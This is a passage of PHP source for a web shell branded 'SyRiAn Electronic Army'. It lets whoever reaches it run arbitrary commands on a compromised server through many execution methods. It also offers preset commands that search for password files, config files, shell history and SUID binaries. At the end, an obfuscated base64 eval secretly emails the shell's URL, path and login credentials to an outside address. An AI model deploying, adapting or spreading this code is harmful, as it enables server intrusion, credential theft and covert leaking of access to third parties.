772.     $safe_mode = ini_get("safe_mode");
773.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
774.     else {$safe_mode = '<font color="red">ON</font>';}
775.     return $safe_mode;
776. }
777. function DisableFunctions() {
778.     $disfun = ini_get('disable_functions');
779.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
780. }
781. function RegisterGlobals() {
782.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
783.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
784. }
785. function GetRealIP() {
786.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
787.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
788.     else {$ip=getenv(REMOTE_ADDR);}
789.     return $ip;
790. }
791. function SelectCommand($os) {
792.     global $os;
793.     if($os == 'Windows') {
794.         echo "
795.         <select name='alias' id='alias' onChange='AddAlias();' >
796.         <option value=''>NONE</option> 
797.         <option value='dir' >List Directory</option>
798.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
799.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
800.         <option value='netstat -an'>Show active connections</option>
801.         <option value='net start'>Show running services</option>
802.         <option value='tasklist'>Show Pro</option>
803.         <option value='net user'>User accounts</option>
804.         <option value='net view'>Show computers</option>
805.         <option value='arp -a'>ARP Table</option>
806.         <option value='ipconfig /all'>IP Configuration</option>
807.         <option value='netstat -an'>netstat -an</option>
808.         <option value='systeminfo'>System Informations</option>
809.         <option value='getmac'>Get Mac Address</option>
810.         </select>
811.         ";
812.     }
813.     else {
814.         echo "
815.         <select name='alias' id='alias' onChange='AddAlias();' >
816.         <option value=''>NONE</option> 
817.         <option value='ls -la'>List dir</option>
818.         <option value='cat /etc/hosts'>IP Addresses</option>
819.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
820.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
821.         <option value='netstat -an | grep -i listen'>show opened ports</option>
822.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
823.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
824.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
825.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
826.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
827.         <option value='find / -type f -name \"config*\"'>find config* files</option>
828.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
829.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
830.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
831.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
832.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
833.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
834.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
835.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
836.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
837.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
838.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
839.         <option value='locate httpd.conf'>locate httpd.conf files</option>
840.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
841.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
842.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
843.         <option value='locate my.conf'>locate my.conf files</option>
844.         <option value='locate admin.php'>locate admin.php files</option>
845.         <option value='locate cfg.php'>locate cfg.php files</option>
846.         <option value='locate conf.php'>locate conf.php files</option>
847.         <option value='locate config.dat'>locate config.dat files</option>
848.         <option value='locate config.php'>locate config.php files</option>
849.         <option value='locate config.inc'>locate config.inc files</option>
850.         <option value='locate config.inc.php'>locate config.inc.php</option>
851.         <option value='locate config.default.php'>locate config.default.php files</option>
852.         <option value='locate config'>locate config* files </option>
853.         <option value='locate \".conf\"'>locate .conf files</option>
854.         <option value='locate \".pwd\"'>locate .pwd files</option>
855.         <option value='locate \".sql\"'>locate .sql files</option>
856.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
857.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
858.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
859.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
860.         <option value='locate backup'>locate backup files</option>
861.         <option value='locate dump'>locate dump files</option>
862.         <option value='locate priv'>locate priv files</option>
863.         </select>
864.         ";
865.     }
866. }
867. function CSS($sh3llColor) {
868.     $css =  "
869.     <style>
870.     BODY
871.     {
872.         FONT-FAMILY: Verdana;
873.         margin: 2;
874.         background-color: #000000;
875.         color:white;
876.         font-size:10pt;
877.     }
878.     sy  
879.     {
880.         color:".$sh3llColor.";
881.         font-size:7pt;
882.     }
883.     #Box
884.     {
885.         color:".$sh3llColor.";
886.         background-color:#000;
887.         font-size:14px;
888.         font-weight:bold;
889.  
890.         border:none;
891.     }
892.     table
893.     {
894.         border:none;
895.         BORDER:  #eeeeee  outset;
896.         BACKGROUND-COLOR: #000000;
897.         color: #cccccc;
898.         font-size:10px;
899.     }
900.     tr
901.     {
902.         BORDER-RIGHT:  #cccccc 1px solid;
903.         BORDER-TOP:    #cccccc 1px solid;
904.         BORDER-LEFT:   #cccccc 1px solid;
905.         BORDER-BOTTOM: #cccccc 1px solid;
906.         color: #ffffff;
907.     }
908.     td
909.     {
910.         BORDER-RIGHT:  #cccccc 1px solid;
911.         BORDER-TOP:    #cccccc 1px solid;
912.         BORDER-LEFT:   #cccccc 1px solid;
913.         BORDER-BOTTOM: #cccccc 1px solid;
914.         color: #cccccc;
915.     }
916.  
917.     input
918.     {
919.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
920.         BORDER-TOP:    ".$sh3llColor." 1px solid;
921.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
922.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
923.         BACKGROUND-COLOR: #333333;
924.         font: 9pt tahoma;
925.         color: #ffffff;
926.     }
927.     select
928.     {
929.         BORDER-RIGHT:  #ffffff 1px solid;
930.         BORDER-TOP:    #999999 1px solid;
931.         BORDER-LEFT:   #999999 1px solid;
932.         BORDER-BOTTOM: #ffffff 1px solid;
933.         BACKGROUND-COLOR: #000000;
934.         font: 9pt tahoma;
935.         color: #CCCCCC;;
936.     }
937.     submit
938.     {
939.         BORDER:  1px outset buttonhighlight;
940.         BACKGROUND-COLOR: #272727;
941.         width: 40%;
942.         color: #cccccc;
943.     }
944.     textarea
945.     {
946.         BORDER-RIGHT:  #ffffff 1px solid;
947.         BORDER-TOP:    #999999 1px solid;
948.         BORDER-LEFT:   #999999 1px solid;
949.         BORDER-BOTTOM: #ffffff 1px solid;
950.         BACKGROUND-COLOR: #333333;
951.         color: #ffffff;
952.     }
953.     .Save{
954.         width:500px;   
955.         border-color:red;
956.     }
957.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
958.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
959.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
960.     A:hover {color:blue;TEXT-DECORATION: none;}
961.     </style>
962.     <script>
963.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
964.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
965.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
966.     function change_dir_mode() {
967.         var dir_mode = document.getElementById('dir_mode').value;
968.         document.location = '?dir_mode='+dir_mode;
969.     }
970.     </script>
971.     ";
972.     return $css;
973. }
974. function filter($string) {
975.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
976.     else{return $string;    }
977. }
978. function footer() {
979.     echo '
980.     <table width="100%">
981.     <tr>
982.     <td width="100%"><center>
983.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
984.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
985.     <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
986.     </center></td>
987.     </tr>
988.     </table>
989.     </body></html>
990.     ';
991. }
992. function print_exe_method() {
993.     global $os; global $exec_method;
994.     if($os == "Linux") {
995.         ?>
996.         <select name="exe_method" >
997.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
998.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
999.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
1000.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1001.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1002.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1003.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1004.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1005.         </select>
1006.         <?php
1007.     } else {
1008.         ?>
1009.         <select name="exe_method" >
1010.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
1011.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
1012.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
1013.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
1014.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
1015.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
1016.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
1017.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
1018.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
1019.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
1020.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
1021.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
1022.         </select>
1023.         <?php
1024.     }
1025. }
1026. function Exe($command) {
1027.     global $dir;global $os;global $exec_method;
1028.     $command = filter($command);
1029.    
1030.     if($exec_method == "exec") {
1031.         exec($command,$output);echo join("\n",$output);
1032.     } else if($exec_method == "system") {
1033.         system($command);
1034.     } else if($exec_method == "shell_exec") {
1035.         echo shell_exec($command);
1036.     } else if($exec_method == "passthru") {
1037.         passthru($command);
1038.     } else if($exec_method == "proc_open") {
1039.         echo proc_exec($command,$dir);
1040.     } else if($exec_method == "popen") {
1041.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
1042.     } else if($exec_method == "win_shell_execute") {
1043.         echo winshell($command);
1044.     } else if($exec_method == "win32_create_service") {
1045.         echo srvshell($command);
1046.     } else if($exec_method == "ffi") {
1047.         echo ffishell($command);
1048.     } else if($exec_method == "perl") {
1049.         echo perlshell($command);
1050.     } else if($exec_method == "python") {
1051.         echo python_eval("import os\nos.system('".$command."')");
1052.     } else if($exec_method == "slash_bypass") {
1053.         echo slashBypass($command);
1054.     }
1055. }
1056. function proc_exec($com , $dir) {
1057.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
1058.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
1059.     return stream_get_contents($pipes[1]);
1060. }
1061. function winshell($command) {
1062.     $name=whereistmP()."\\".uniqid('NJ');
1063.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
1064.     sleep(1);
1065.     $exec=file_get_contents($name);
1066.     DeleteFile($name);
1067.     return $exec;
1068. }
1069. function srvshell($command) {
1070.     $name=whereistmP()."\\".uniqid('NJ');
1071.     $n=uniqid('NJ');
1072.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
1073.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
1074.     win32_start_service($n);
1075.     win32_stop_service($n);
1076.     win32_delete_service($n);
1077.     while(!file_exists($name))sleep(1);
1078.     $exec=file_get_contents($name);
1079.     DeleteFile($name);
1080.     return $exec;
1081. }
1082. function ffishell($command) {
1083.     $name=whereistmP()."\\".uniqid('NJ');
1084.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
1085.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
1086.     while(!file_exists($name))sleep(1);
1087.     $exec=file_get_contents($name);
1088.     DeleteFile($name);
1089.     return $exec;
1090. }
1091. function perlshell($command) {
1092.     $perl=new perl();
1093.     ob_start();
1094.     $perl->eval("system('".$command."')");
1095.     $exec=ob_get_contents();
1096.     ob_end_clean();
1097.     return $exec;
1098. }
1099. function slashBypass($cmd) {
1100.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
1101.     exec("\start cmd.bat");
1102.     $content = file_get_contents('sy3.txt');
1103.     unlink('sy3.txt');
1104.     return $content;
1105. }
1106. function GenerateFile($name,$content) {
1107.     if(function_exists('fopen') && function_exists('fclose')) {
1108.         $file = fopen($name,"w+");
1109.         if($file) {
1110.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
1111.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
1112.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
1113.             if(!$writeFile){return false;}
1114.         }
1115.         else{return false;}fclose($file);return true;
1116.     }
1117. }
1118. function ScanDirs() {
1119.     global $os; global $dir;global $safeMode;global $dir_mode;
1120.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
1121.     else {
1122.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
1123. -----------------------------------------------------------------------------
1124. ";
1125.         $handel = opendir($dir);
1126.         while(($file = readdir($handel))!= false)
1127.         {
1128.             $size = filesize($file);
1129.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
1130.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
1131.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
1132.             $perms = fileperms($file);
1133.             $time = date("y/m/d", filectime($file));
1134.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
1135.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
1136.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
1137. ";
1138.         }
1139.     }
1140.     return $result;
1141. }
1142. echo footer();
1143. ?>
1144. <?php
1145. eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0='));
1146. ?>